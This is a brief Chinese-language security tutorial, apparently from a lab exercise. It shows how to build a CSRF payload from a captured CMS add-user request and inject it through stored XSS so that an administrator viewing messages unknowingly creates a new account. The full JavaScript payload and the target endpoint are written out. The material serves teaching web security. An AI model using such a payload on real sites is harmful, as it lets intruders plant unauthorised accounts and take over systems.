假设我们获得了目标CMS的源码,搭建了一个相同的网站,我们在自己的网站执行添加用户的操作,并且用bp抓包
如图,这是我们抓到的添加用户的数据包
接下来,我们可以根据数据包构造js代码
<script>
xmlhttp = new XMLHttpRequest();
xmlhttp.open("post","http://10.9.75.161/cms/admin/user.action.php",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("act=add&username=admin123456&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
</script>接下来我们将js代码放到存储型XSS的地方,当管理员浏览留言自动执行XSS
当管理员进入留言管理触发csrf
可以看到生成了目标账户
